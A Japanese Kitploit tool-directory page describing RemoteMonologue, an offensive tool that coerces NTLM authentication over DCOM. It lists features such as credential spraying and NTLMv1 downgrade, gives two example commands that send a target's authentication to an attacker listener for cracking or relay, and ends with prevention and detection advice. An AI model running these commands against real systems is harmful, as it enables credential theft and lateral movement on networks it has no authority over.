Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
RemoteMonologue — DCOMの武器化によるNTLM認証の強制 | Kitploit
ツール/GitHubGitHub/xforcered/remotemonologue
パスワード攻撃エクスプロイト横移動情報収集ペネトレーションテストレッドチーミング
GitHubxforcered/remotemonologue

RemoteMonologue

DCOMの武器化によるNTLM認証の強制

リポジトリを見る
275221年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

RemoteMonologue

RemoteMonologue は、Interactive User RunAs キーを悪用して DCOM 経由で NTLM 認証を強制することにより、リモートユーザーの侵害を可能にする Windows 資格情報収集テクニックです。

詳細については、X-Force Red の RemoteMonologue: Weaponizing DCOM for NTLM Authentication Coercions をお読みください。

特徴

🔹 DCOM を介した認証強制 (-dcom)

  • 4 つの DCOM オブジェクト (ServerDataCollectorSet、FileSystemImage、MSTSWebProxy、UpdateSession) を対象に、指定したリスナー (-auth-to) への NTLM 認証をトリガーします。

🔹 資格情報スプレー (-spray)

  • ユーザー資格情報の取得と同時に、複数のシステムに対して資格情報を検証します。

🔹 NetNTLMv1 ダウングレード攻撃 (-downgrade)

  • ターゲットに NTLMv1 の使用を強制し、資格情報のクラックとリレーを容易にします。

🔹 WebClient サービスの悪用 (-webclient)

  • WebClient サービスを有効にして、HTTP ベースの認証強制を容易にします。

🔹 ユーザー列挙 (-query)

  • ターゲットシステム上でアクティブなセッションを持つユーザーを特定します。

注: ターゲットシステムに対するローカル管理者権限が必要です。

セットアップ

root@kitploit:~
pip install impacket

使用例

以下は、Responder をリスナーとして使用し、NetNTLMv1 ダウングレード攻撃とともに RemoteMonologue を実行する例です。デフォルトでは、DCOM オプションが指定されていない場合、ツールは ServerDataCollectorSet DCOM オブジェクトを使用します。

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

image

以下は別の例です。今回は FileSystemImage DCOM オブジェクトを使用し、WebClient サービスを有効にして HTTP 認証を取得し、ntlmrelayx を使用して LDAP にリレーする攻撃を実行します。

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

image

防御に関する考慮事項

これらのテクニックから保護し検出するために、実施可能な予防策と検出手段がいくつかあります。

予防策:

  1. LDAP 署名とチャネルバインディングを有効にする: ドメインコントローラーで LDAP 署名の適用とチャネルバインディングを構成し、LDAP エンドポイントをリレー攻撃から保護します。注: これらの設定は Windows Server 2025 以降、デフォルトで適用されます。

  2. 最新の Windows バージョンにアップグレードする: サーバーを Windows Server 2025 に、ワークステーションを Windows 11 バージョン 24H2 にアップグレードして、NetNTLM ダウングレード攻撃を緩和します。これらのバージョンでは NTLMv1 が削除されているためです。

  3. SMB 署名を強制する: Windows サーバーで SMB 署名を有効にして強制し、SMB リレー攻撃を防ぎます。

  4. 強力なパスワードポリシーを実装する: 強力なパスワード要件を適用して、パスワードクラッキング攻撃をより困難にします。

検出手段:

  1. DCOM オブジェクトへのリモートアクセスを監視する: 影響を受ける DCOM オブジェクトとその特定のプロパティおよびメソッドへのアクセスを追跡して、異常なアクティビティを特定します。

  2. レジストリの変更を監視する: RunAs および LmCompatibilityLevel レジストリキーの変更を監視します。

  3. WebClient サービスのアクティビティを追跡する: WebClient サービスがリモートで有効化された事例を監視します。これは HTTP ベースの NTLM 認証を容易にするために使用されるためです。

ツールをダウンロード